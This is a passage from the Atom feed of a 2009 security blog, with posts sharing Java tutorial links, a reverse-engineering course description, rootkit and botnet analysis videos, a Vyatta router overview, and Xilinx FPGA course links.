href="http://www.youtube.com/watch?v=r-_6fJpC-pk"&gt;Java Programming Tutorial - 45 - EnumSet range&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=Mhxp5dZOy78"&gt;Java Programming Tutorial - 46 - Static&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=14c1oJjgC8g"&gt;Java Programming Tutorial - 47 - More on Static&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=Suxdg95FV1w"&gt;Java Programming Tutorial - 48 - final&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=9JpNY-XAseg"&gt;Java Programming Tutorial - 49 - Inheritance&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=jJjg4JweJZU"&gt;Java Programming Tutorial - 50 - Graphical User Interface GUI&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=jUdIAgJ7JKo"&gt;Java Programming Tutorial - 51 - GUI with JFrame&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=3EE7E3bvfe8"&gt;Java Programming Tutorial - 52 - Event Handling&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=qhYook53olE"&gt;Java Programming Tutorial - 53 - ActionListner&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=M1_-sigEPtE"&gt;Java Programming Tutorial - 54 - Event Handler Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=0xw06loTm1k"&gt;Java Programming Tutorial - 55 - Intoduction to Polymorphism&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=KKbN5pjBZGM"&gt;Java Programming Tutorial - 56 - Polymorphic Arguements&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=zN9pKULyoj4"&gt;Java Programming Tutorial - 57 - Overriding Rules&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=TyPNvt6Zg8c"&gt;Java Programming Tutorial - 58 - Abstract and Concrete Classes&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=slY5Ag7IjM0"&gt;Java Programming Tutorial - 59 - Class to Hold Objects&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=0--h2x6HENA"&gt;Java Programming Tutorial - 60 - Array Holding Many Objects&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=6d0m_L8_1XU"&gt;Java Programming Tutorial - 61 - Simple Polymorphic Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=6iV-v_m0z0w"&gt;Java Programming Tutorial - 62 - JButton&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=3RQOikbGGUM"&gt;Java Programming Tutorial - 63 - JButton Final Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=_UuDuj-RNRg"&gt;Java Programming Tutorial - 64 - JCheckBox&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=Y8zKDsenQFA"&gt;Java Programming Tutorial - 65 - The Final Check Box Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=_d4CU9MveLE"&gt;Java Programming Tutorial - 66 - JRadioButton&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=-ptlsT9KsM8"&gt;Java Programming Tutorial - 67 - JRadioButton Final Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=vd-k2oBMXUI"&gt;Java Programming Tutorial - 68 - JComboBox&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=XS4-5GmRnp8"&gt;Java Programming Tutorial - 69 - Drop Down List Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=GBlKa8cNROM"&gt;Java Programming Tutorial - 70 - JList&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=aLkkYbHz16E"&gt;Java Programming Tutorial - 71 - JList Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=9z_8yEv7nIc"&gt;Java Programming Tutorial - 72 - Multiple Selection List&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=68X8RUxeXeA"&gt;Java Programming Tutorial - 73 - Moving List Items Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=hsHqhX0s7Rs"&gt;Java Programming Tutorial - 74 - Mouse Events&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=MpIHF4V3zMc"&gt;Java Programming Tutorial - 75 - MouseListener interface&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=sdUJR_DSyBU"&gt;Java Programming Tutorial - 76 - MouseMotionListener interface&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=UuKNGMCfSkQ"&gt;Java Programming Tutorial - 77 - Adapter Classes&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=7fC9nL3_AQQ"&gt;Java Programming Tutorial - 78 - File Class&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=G0DfmD0KKyc"&gt;Java Programming Tutorial - 79 - Creating Files&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=Bws9aQuAcdg"&gt;Java Programming Tutorial - 80 - Writing to Files&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=3RNYUKxAgmw"&gt;Java Programming Tutorial - 81 - Reading from Files&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=K_-3OLkXkzY"&gt;Java Programming Tutorial - 82 - Exception Handling&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=DFQzFJqOSbA"&gt;Java Programming Tutorial - 83 - FlowLayout&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=2l5-5PMUc5Y"&gt;Java Programming Tutorial - 84 - Drawing Graphics&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=052U-bWEXrk"&gt;Java Programming Tutorial - 85 - JColorChooser&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=OWOeE90ET6w"&gt;Java Programming Tutorial - 86 - Drawing More Stuff&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is awesome collection of Java videos. Check it out when you get a chance.&lt;br /&gt;&lt;br /&gt;Thank you for choosing our blog.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-2410456130813069938?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/2410456130813069938/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=2410456130813069938' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2410456130813069938'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2410456130813069938'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/java-programming_12.html' title='Java Programming'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5767843337412841203</id><published>2009-11-11T17:26:00.002-11:00</published><updated>2009-11-12T13:06:00.502-11:00</updated><title type='text'>Reverse Engineering Course - InfoSec Institute</title><content type='html'>When browsing through Reverse Engineering courses, I found the following course in the InfoSec Institute. &lt;a href="http://www.infosecinstitute.com/courses/reverse_engineering_training.html"&gt;Check it out!&lt;/a&gt; The following is copied and pasted from InfoSec Institute course page:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Reverse Engineering Training&lt;br /&gt;&lt;br /&gt;Reverse Engineering: Malware, Binary Analysis and Software Vulnerabilities&lt;br /&gt;&lt;br /&gt;Reverse engineering is a vitally important skill for today's expert security professional. Everything from reverse engineering malware to discovering vulnerabilities in binaries are required in order to properly secure an organization from today's ever evolving threats.&lt;br /&gt;&lt;br /&gt;In this 5 day hands-on course, you will gain the necessary binary analysis skills to discover the true nature of any Windows binary. You will learn how to recognize the high level language constructs (such as branching statements, looping functions and network socket code) critical to performing a thorough and professional reverse engineering analysis of a binary. After learning these important introductory skills, you will advance to the analysis of:&lt;br /&gt;&lt;br /&gt;    * Hostile Code &amp; Malware, including: Worms, Viruses, Trojans, Rootkits and Bots.&lt;br /&gt;    * Vulnerabilities in Binaries, including: Format string vulnerabilities, buffer overflow conditions, and the identification of flawed cryptographic schemes&lt;br /&gt;    * Binary obfuscation schemes, used by: Hackers, Trojan writers and copy protection algorithms&lt;br /&gt;&lt;br /&gt;Additionally you will learn how to recognize the features modern optimizing compilers, including the gcc 4.x family of compilers and the ubiquitous Visual Studio .NET.&lt;br /&gt;&lt;br /&gt;InfoSec Institute will train you on the standard reverse engineering programs IDA Pro, Ollydbg, and Softice. You will also learn how to use various hex editors, binary analysis programs, and code coverage analyzers.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Reverse Engineering is a critical skill.&lt;br /&gt;Many incident response situations and computer forensics investigations cannot be completed accurately or thoroughly without understanding the runtime nature of a binary. Hackers increasingly use customized trojans that are not detected by antivirus which can only be analyzed and traced back to the original attacker via reverse engineering.&lt;br /&gt;&lt;br /&gt;Additionally, many binary programs contain vulnerabilities, such as buffer overflows and the use of very weak cryptographic algorithms. The only way to discover these critical vulnerabilities for closed-source programs is to reverse engineer them.&lt;br /&gt;&lt;br /&gt;Reverse engineering is also required in order to understand complex binary obfuscation schemes used by copy protection vendors, as well as obfuscation put in place by commercial software vendors.&lt;br /&gt;&lt;br /&gt;Learn from Experts in the field of Reverse Engineering:&lt;br /&gt;All of the instructors for InfoSec Institute's Reverse Engineering course active work in the field of incident response or security research. Our instructors have spoken at high-profile conferences (such as the Black Hat Briefings, the RSA Security Conference, and the Pentagon Security Forum) and industry events.&lt;br /&gt;&lt;br /&gt;Learn reverse engineering in our hands-on classroom labs:&lt;br /&gt;Some of the reverse engineering concepts you will learn to master during this course...&lt;br /&gt;&lt;br /&gt;    * Understanding conditional branching statements&lt;br /&gt;    * Virtual machines and bytecode&lt;br /&gt;    * System vs. Code Level reversing&lt;br /&gt;    * Identifying variables&lt;br /&gt;    * Compilers and branch prediction&lt;br /&gt;    * Memory management&lt;br /&gt;    * Win32 executable formats and image sections&lt;br /&gt;    * Fundamentals of IDA Pro&lt;br /&gt;    * Advanced uses of IDA Pro with hostile code&lt;br /&gt;    * Using Ollydbg for runtime analysis of malware&lt;br /&gt;    * Kernel mode debugging with SoftICE&lt;br /&gt;    * Dumping executables from memory with Dumpbin&lt;br /&gt;    * Locating undocumented APIs&lt;br /&gt;    * Reversing ntdll.dll&lt;br /&gt;    * Obfuscation of file formats&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;    * Understanding hashing functions&lt;br /&gt;    * Working with encrypted binaries&lt;br /&gt;    * Reversing UPX and other compression types&lt;br /&gt;    * Discovering stack overflows&lt;br /&gt;    * Discovering heap overflows&lt;br /&gt;    * Creating a sandbox to isolate malware&lt;br /&gt;    * Unpacking malware&lt;br /&gt;    * Monitoring registry changes&lt;br /&gt;    * Identifying malware communication channels&lt;br /&gt;    * Understanding Digital Rights Management (DRM) implementations&lt;br /&gt;    * Thwarting anti-debugger code&lt;br /&gt;    * Debugging multi-threaded programs&lt;br /&gt;    * Recursive traversal dissasemblers&lt;br /&gt;    * Reversing .NET bytecode&lt;br /&gt;    * CREA Review&lt;br /&gt;    * Legal issues and the DMCA&lt;br /&gt;&lt;br /&gt;Certified Reverse Engineering Analyst:&lt;br /&gt;In any hands on reverse engineer training course, it is important to have the opportunity to prove to current or potential employers that you have the skills you say you do. This course prepares you for the top reverse engineering certification in the industry, the CREA. The exam is given on-site, InfoSec Institute has achieved a 93% pass rate for this certification.&lt;br /&gt;&lt;br /&gt;How You Benefit:&lt;br /&gt;&lt;br /&gt;    * Gain the in-demand career skills of a reverse engineer. Very few information security professionals, incident response analysts and vulnerability researchers have the ability to reverse binaries efficiently. You will undoubtedly be at the top of your professional field.&lt;br /&gt;    * Learn the methodologies, tools, and manual reversing techniques used real world situations in our reversing lab.&lt;br /&gt;    * Move beyond automated "input and output" testing of binaries, commonly used by fuzzers and other analysis tools.&lt;br /&gt;    * More than interesting theories and lecture, get your hands dirty in our dedicated reversing lab in this security training course.&lt;br /&gt;&lt;br /&gt;What's Included:&lt;br /&gt;&lt;br /&gt;    * 5 Days of Expert Reverse Engineering Instruction from a senior instructor with real-world experience and deep knowledge of course content.&lt;br /&gt;    * Guaranteed small class size (less than 10-16 Students), you get an intimate learning setting not offered at any of our competitors.&lt;br /&gt;    * InfoSec Institute's Custom Reversing Tools Enterprise Suite, includes every program covered in the course for at home study. (119 Tools).&lt;br /&gt;    * All meals, snacks and refreshments included.&lt;br /&gt;    * Certified Reverse Engineering Analyst (CREA) exam fees.&lt;br /&gt;    * Lecture, Lab Exercise and Text book&lt;br /&gt;&lt;br /&gt;Required Prerequisites:&lt;br /&gt;&lt;br /&gt;    * Firm understanding of the Windows Operating System&lt;br /&gt;    * Firm understanding of computer architecture concepts&lt;br /&gt;    * Grasp of the TCP/IP protocols&lt;br /&gt;&lt;br /&gt;If you are unsure if you meet the required prerequisites, contact us for a quick network security training skill check. &lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Thank you for checking out the stuff. Kindly, give your honest review in COMMENTS.&lt;br /&gt;&lt;br /&gt;- EF&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5767843337412841203?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5767843337412841203/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5767843337412841203' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5767843337412841203'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5767843337412841203'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/reverse-engineering-course-infosec.html' title='Reverse Engineering Course - InfoSec Institute'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-6917400853212220817</id><published>2009-11-11T16:53:00.003-11:00</published><updated>2009-11-11T17:24:41.921-11:00</updated><title type='text'>WatchGuard RootKits &amp; Botnets Analysis</title><content type='html'>Found couple of interesting Rootkit &amp; Botnet videos offered by Watchguard at Youtube.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;RootKits Analysis PART 1 (1/2)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/PPHCI6AlqH0&amp;hl=en_US&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/PPHCI6AlqH0&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;RootKits Analysis PART 2&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/COea1DmeoyE&amp;hl=en_US&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/COea1DmeoyE&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Botnet Source Code (1/2)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Z33I5N6VWCI&amp;hl=en_US&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Z33I5N6VWCI&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Botnet Source Code (2/2)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/lvBi4rGnf4s&amp;hl=en_US&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/lvBi4rGnf4s&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;These videos are quite old, though it is still helpful for people who intend to learn more about this. Check it out!&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-6917400853212220817?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/6917400853212220817/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=6917400853212220817' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6917400853212220817'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6917400853212220817'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/watchguard-rootkits-botnets-analysis.html' title='WatchGuard RootKits &amp; Botnets Analysis'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-6827777685327560630</id><published>2009-11-10T16:00:00.006-11:00</published><updated>2009-11-10T17:23:32.073-11:00</updated><title type='text'>Vyatta</title><content type='html'>What is Vyatta?&lt;br /&gt;It is an open source, linux based software that provides fire-walling, routing, VPN's and intrusion prevention;  in addition, to load balancing and other features found on CISCO routers&lt;br /&gt;&lt;a href="http://www.vyatta.org/downloads"&gt;http://www.vyatta.org/downloads&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Why Vyatta?&lt;br /&gt;Free and open source is always good.&lt;br /&gt;The beauty is that one can have the functionality of a close to CISCO router, but the difference being that Vyatta is open source and based on linux, while most CISCO routers will cost you some dough.&lt;br /&gt;There is also an option to install  Vyatta if one is so inclined.&lt;br /&gt;Furthermore, the nice thing about the Vyatta implementation is that it can be used in a network lab for certain pen-tests or setup up in a virtual environment.&lt;br /&gt;&lt;br /&gt;I hope they will add an implementation that one could just use to flash their firmware as in DD-WRT&lt;a href="http://www.dd-wrt.com/site/index"&gt;http://www.dd-wrt.com/site/index&lt;/a&gt; or Tomato&lt;a href="http://www.polarcloud.com/tomato"&gt; http://www.polarcloud.com/tomato&lt;/a&gt; , however, for more security related tests and some functionality similar to CISCO routers this is a good way to go.For router service enumeration, fingerprinting videos, and some interesting stuff check out this&lt;br /&gt;video:&lt;a href="http://securitytube.net/Router-Hacking-Part-2-%28Service-Enumeration,-Fingerprinting-and-Default-Accounts%29-video.aspx"&gt;http://securitytube.net/Router-Hacking-Part-2-%28Service-Enumeration,-Fingerprinting-and-Default-Accounts%29-video.aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And if you have a DD-WRT, you might want to try some fun stuff with this:&lt;br /&gt;&lt;a href="http://security-sh3ll.blogspot.com/2009/07/exploiting-new-dd-wrt-remote-root-with.html"&gt;http://security-sh3ll.blogspot.com/2009/07/exploiting-new-dd-wrt-remote-root-with.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-6827777685327560630?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/6827777685327560630/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=6827777685327560630' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6827777685327560630'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6827777685327560630'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/vyatta.html' title='Vyatta'/><author><name>oktet8</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/_VRSEHySfTaU/Su6LkL0Hh7I/AAAAAAAAAAM/cvE2OdT9E1M/S220/Scorpion.png'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-8882145265675436219</id><published>2009-11-08T11:47:00.002-11:00</published><updated>2009-11-08T12:42:27.519-11:00</updated><title type='text'>XILINX: Recorded E-Learning Course Listing</title><content type='html'>Xilinx is a leading organization in programmable logic solutions. Their About Us says:&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;blockquote&gt;&lt;br /&gt;Xilinx is the worldwide leader in programmable logic solutions with over 51 percent market segment share in calendar year 2007, according to iSuppli. PLDs represent an exciting growth potential in the chip market thanks to their flexible nature and ability to change functionality even after being manufactured.&lt;br /&gt;&lt;br /&gt;Xilinx programmable solutions fuel product innovation in diverse markets worldwide and are designed in a wide range of applications. Xilinx customers can change or upgrade product features and functions "on the fly" - adapting to new standards and reconfiguring the hardware for a specific application. This "on the fly" technology enables faster time-to-market, product differentiation and reduced cost.&lt;/blockquote&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gJDtaXmerr4/SvdXMgwxlGI/AAAAAAAAAXs/utdXFS9Dvhk/s1600-h/FPGA+and+CPLD+Solutions+from+Xilinx,+Inc._1257723647506.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 144px;" src="http://1.bp.blogspot.com/_gJDtaXmerr4/SvdXMgwxlGI/AAAAAAAAAXs/utdXFS9Dvhk/s320/FPGA+and+CPLD+Solutions+from+Xilinx,+Inc._1257723647506.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5401882150518756450" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Check out more on their main website, &lt;a href="http://www.xilinx.com/"&gt;www.xilinx.com&lt;/a&gt;. They have pretty good set of videos on programmable gate arrays and other cool stuff. Check it out, when you can:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;FPGA Design Courses&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/basic-fpga-config1.htm"&gt;Basic FPGA Configuration - Part 1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/basic-fpga-config2.htm"&gt;Basic FPGA Configuration - Part 2&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/arch-wiz-fp-edit.htm"&gt;Basic FPGA Architecture: Architecture Wizard and PinAhead &lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/mem-clk-resources.htm"&gt;Basic FPGA Architecture: Memory and Clocking Resources&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/slice-io-resources.htm"&gt;Basic FPGA Architecture: Slice and I/O Resources&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/chipscope-pro.htm"&gt;ChipScope™ Pro Software (with labs)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/s3e-fpga-arch.htm"&gt;Spartan®-3E FPGA Architecture&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/s3-arch-overview.htm"&gt;Spartan-3 FPGA Architecture Overview&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/area-constraints.htm"&gt;Area Constraints&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/timing-close-flow.htm"&gt;Timing Closure Flow&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/v4-btp.htm"&gt;Achieving Breakthrough Performance in Virtex-4 FPGAs&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/v2-clk-tech.htm"&gt;Clocking Techniques for Virtex-II FPGAs&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/spi-42.htm"&gt;SPI-4.2&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/ic-packaging.htm"&gt;IC Packaging&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/ddr-mem-interface.htm"&gt;DDR-I SDRAM Memory Interface&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/asic-p1.htm"&gt;FPGA and ASIC Technology Comparison module (Part 1) - Launch&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/asic-p2.htm"&gt;FPGA and ASIC Technology Comparison module (Part 2) - Launch&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/asic-3.htm"&gt;FPGA vs. ASIC Design Flow (no lab) module - Launch&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/asic2-p1.htm"&gt;ASIC to FPGA Coding Conversion (includes lab) module (Part 1) - Launch&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/asic2-p2.htm"&gt;ASIC to FPGA Coding Conversion (includes lab) module (Part 2) - Launch&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/power-estimation.htm"&gt;Power Estimation&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/synthesis.htm"&gt;Synthesis Options&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Connectivity Design Courses&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/pci-express.htm"&gt;PCI Express®&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;DSP Design Courses&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/sys-gen.htm"&gt;System Generator Getting Started&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/acceldsp-jumpstart.htm"&gt;AccelDSP™ Jump Start Modules&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;CPLD Design Courses&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/cool-runner.htm"&gt;CoolRunner™-II CPLD: Clocking and I/O&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Languages&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/hdl-code-p1.htm"&gt;Basic HDL Coding Techniques - Part 1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://survey.xilinx.com/ss/wsb.dll/3/hdl-code-p2.htm"&gt;Basic HDL Coding Techniques - Part 2&lt;/a&gt;&lt;br 